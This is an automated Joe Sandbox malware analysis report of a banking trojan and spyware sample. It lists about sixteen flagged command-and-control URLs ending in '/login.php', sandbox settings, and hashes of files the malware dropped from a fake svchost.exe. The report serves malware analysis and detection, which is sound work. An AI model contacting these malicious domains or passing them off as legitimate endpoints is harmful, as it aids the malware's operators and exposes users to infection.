                                                                                                                                                                                                            http://lyxyxox.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650532264.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648460098.00000000029BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qedykiv.com/login.phpsvchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vocypok.com/login.phpsvchost.exe, 00000002.00000003.2063012726.0000000002953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qetyveq.com/login.phpsvchost.exe, 00000002.00000003.2094100797.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654719612.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078075418.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095132810.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650594979.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077922127.0000000002959000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://puvydov.com/login.phpsvchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850188368.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://gahyqub.com/login.phpsvchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600414604.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lysyfyj.com/login.phpsvchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727481945.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686100811.00000000008A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qekyqop.com/login.phpsvchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418399086.00000000060CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qegyhig.com/login.phprsvchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445129038.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447072147.00000000008A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://volyquk.com/login.phpsvchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609566832.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://lykyfen.com/login.phpsvchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533526406.000000000295D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1552047254.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533898265.0000000002957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526067014.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550101575.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526019425.000000000294D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://lykywid.com/login.phpsvchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://lyvyxyj.com/login.phpsvchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.00000000060A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600322672.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://pumydyg.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051811464.00000000029FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://qexylup.com/login.phpsvchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445129038.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447072147.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2649652867.00000000008F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://lymyjon.com/login.phpsvchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550752582.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548763256.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562152424.0000000006098000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1553832
Start date and time: 2024-11-11 18:32:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 13
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:arxtPs1STE.exe
                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                              Original Sample Name:ce4b4763d9b269ea600e8fc594781882ca6c8486.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.bank.troj.spyw.expl.evad.winEXE@10/53@2130/24
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                                                                                              • Number of executed functions: 118
                                                                                                                                                                                                              • Number of non-executed functions: 196
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 2.23.209.185, 2.23.209.183, 2.23.209.130, 2.23.209.182, 2.23.209.135, 2.23.209.140, 2.23.209.133, 2.23.209.189, 2.23.209.177, 52.168.117.173, 2.23.209.193, 2.23.209.187, 2.23.209.179, 2.23.209.150, 2.23.209.148, 2.23.209.158, 2.23.209.149, 2.23.209.141, 2.23.209.176, 20.42.73.29
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • VT rate limit hit for: arxtPs1STE.exe
Time | Type | Description
12:33:48 | API Interceptor | 7x Sleep call for process: WerFault.exe modified
12:34:02 | API Interceptor | 790934x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                              No context
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24656
                                                                                                                                                                                                              Entropy (8bit):7.9821326567077
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:P0YZ3Jjaxk9sU4B5xLlrzEoqtll4DksQ7vVQE8aP4aujgJYBY1qM8VOcBEt:dZ3VGB5h6zSDkj7v79QaigJQsfcc
                                                                                                                                                                                                              MD5:04ACB993833ED85F1F5F6E355C15B8EC
                                                                                                                                                                                                              SHA1:5E65252CFBAC2D2EA75B77E7343ADAB5D4E7F2B6
                                                                                                                                                                                                              SHA-256:E523DF6FB97A0F0F047B456AF03AD5346010CCECE235F36B00F54C13EEAB9682
                                                                                                                                                                                                              SHA-512:8E206C11059EF790F510895D298900B0D840A666403A18407C249195BD38269F75CC6BE96A54A1E92A2B43B26D2A8CC12C673C64C1417C1E97E686414B3C79EC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                                              Entropy (8bit):7.626935561277827
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                              MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                              SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                              SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                              SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):43182
                                                                                                                                                                                                              Entropy (8bit):7.991084036629475
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:768:A6eLDU7W3WFK7yI4tqcLQa33mXYoQwjWO8Yz+EFdUJ/6l0XnxytlCI88h/hxaW:AD33bOI4tPV3+xzWO8Yz7FdUJSuXnxC1
                                                                                                                                                                                                              MD5:AF34E47103CF2EB9B39D0C55FFED1EAC
                                                                                                                                                                                                              SHA1:847F0D0DE2A90C5B924EECFE2CC90C06FD17ABCB
                                                                                                                                                                                                              SHA-256:8D6A7AFB31F8231244F13832BFD101640A6192F53E1F770F9FF0B4E8720DE6C0
                                                                                                                                                                                                              SHA-512:9EFEEDBBE9D51D3D1EACD3A24DB4F134F9284096BB0A235890CE4C43E7641B018011244BD9B4FBC22BBFE9A0865E8B0CB9478CB155DC4D93A6660A5D2D840DBE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):114
                                                                                                                                                                                                              Entropy (8bit):6.479691220248167
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                              MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                              SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                              SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                              SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59521
                                                                                                                                                                                                              Entropy (8bit):7.972536779168374
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ZQimNJq4lkHqWmHwEyivDfOoG5tN06d+1b:ZRukFmHy4rG5tUb
                                                                                                                                                                                                              MD5:C6268A2DD44D331387D6E513716B65A1
                                                                                                                                                                                                              SHA1:2D982D846C22D45A7E07AB0139E9C90536B930CC
                                                                                                                                                                                                              SHA-256:D9CE9ACB199C9EA90F2315C552199D381BAD0A9971767F1FE309F5444BA9B2CD
                                                                                                                                                                                                              SHA-512:481BAD462004CF0300A0983C742CA71C39586C499D69926980EC279ECEE27CAD6C82AA38BBC5280073A95AA45F1FF051AB5BABA9643055462C0F2D18164BC780
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25028
                                                                                                                                                                                                              Entropy (8bit):7.979531985378584
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:N4ak8nl3r9Htb/yu0qOZZAjjWk5rSV4Z8tPzh3XCV5:yJElb9HPtOZEjWKW4S8P
                                                                                                                                                                                                              MD5:C9696F79799FA5BA5206F94129885F28
                                                                                                                                                                                                              SHA1:6881778879C5FB0C9F06DF425F893927505B6777
                                                                                                                                                                                                              SHA-256:72D529A7929896257E4B7DB4EE480213F944654070D1ED47E3F7E167C5D4957D
                                                                                                                                                                                                              SHA-512:6FEFE993372D9F7B6707E1A153ADC3ACAE2E52C95C19CAF2F819E1B98CD83FD57E8C79DADCA7AE075FF8A560E4B021BF4424435E87ADAEC0679A7FD99E0D95B9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1094
                                                                                                                                                                                                              Entropy (8bit):7.848347003000776
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:IZsdS4WMBLdxezuQj1kZ8l9KfPqiHvkTXRUubBU:QsSixez1Rg8ypkTXRdBU
                                                                                                                                                                                                              MD5:3F46C8333D071C3DACA82DC8C12C7D3D
                                                                                                                                                                                                              SHA1:C373BFFB0BF50CB378F6DE8AF9145B17256A59EA
                                                                                                                                                                                                              SHA-256:191FACDF1EA85248CF0BA2AEA6AB40D975A3FB9F6962A8339A424AC2376B7815
                                                                                                                                                                                                              SHA-512:75A672CDC4B15B4083F56EB54F3F4393895A9AB050186D9553E7AD1773B3474A0A6A6EF8A07F7B30ABA253C3985BCA613883B8B66DE49152884D87D887287E0A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.9549394430616321
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:5cykAeiRplij0BU/bf+fxjRJk1zuiF0zZ24IO8m3fHcs:yybDlbBU/ojPczuiF2Y4IO8Qcs
                                                                                                                                                                                                              MD5:219A26A739509C5B0F134794C04332B5
                                                                                                                                                                                                              SHA1:8434B4EDD36C9365436DB46D0A818C8584FDDD77
                                                                                                                                                                                                              SHA-256:2C583ED9EC0920982F3FF15E27B21D3E527C93169FAFF8EB44A78CEEEE46B821
